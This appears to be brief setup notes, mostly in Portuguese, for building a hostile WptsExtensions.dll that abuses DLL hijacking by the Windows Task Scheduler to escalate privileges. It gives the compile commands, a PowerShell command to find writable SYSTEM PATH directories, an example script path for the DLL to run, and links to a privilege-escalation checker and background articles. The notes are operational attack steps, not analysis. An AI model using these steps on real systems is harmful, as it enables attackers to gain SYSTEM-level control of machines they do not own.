
WptsExtensions.dll for exploiting DLL hijacking of the task scheduler.
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
Atualize a variável TCHAR script[] com um caminho SYSTEM gravável onde a DLL será procurada.
Confira esta ferramenta para encontrar alguns.
Você também pode listar esta variável de ambiente por meio de:
powershell -c "[System.Environment]::GetEnvironmentVariable('PATH','Machine')".
Entre no diretório do seu código-fonte e execute (COMPILE MANUALMENTE para evitar dependências indesejadas):
cl /LD /MT /EHa dllmain.cpp /Fe:WptsExtensions.dll
const TCHAR script[] = TEXT("C:\\Python27\\script.bat"):
powershell -Command "[System.Environment]::GetEnvironmentVariable('PATH','Machine')"
Ferramenta para usar durante seu privesc:
https://github.com/itm4n/PrivescCheck
Artigos:
https://itm4n.github.io/windows-dll-hijacking-clarified/
http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html